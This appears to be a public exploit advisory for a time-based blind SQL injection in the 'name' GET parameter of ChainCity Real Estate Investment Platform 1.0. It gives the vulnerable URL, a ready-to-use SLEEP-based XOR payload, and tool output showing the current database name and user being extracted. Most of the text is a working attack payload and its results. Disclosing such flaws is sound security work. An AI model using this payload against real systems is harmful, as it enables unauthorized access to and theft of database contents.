# Exploit Title: ChainCity Real Estate Investment Platform 1.0 - SQL Injection # Exploit Author: CraCkEr # Date: 12/07/2023 # Vendor: Bug Finder # Vendor Homepage: https://bugfinder.net/ # Software Link: https://script.bugfinder.net/chaincity/ # Tested on: Windows 10 Pro # Impact: Database Access ## Description SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation. GET parameter 'name' is vulnerable to SQL Injection https://website/chaincity/property?name=[SQLI]&location=1&my_range=12786%3B30628&amenity_id%5B%5D=1&rating%5B%5D=4 --- Parameter: name (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: name=villa'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&location=1&my_range=12786;30628&amenity_id[]=1&rating[]=4 --- [+] Starting the Attack fetching current database current database: 'u654912985_chaincity' fetching current user current user: 'u654912985_chaincity@localhost' [-] Done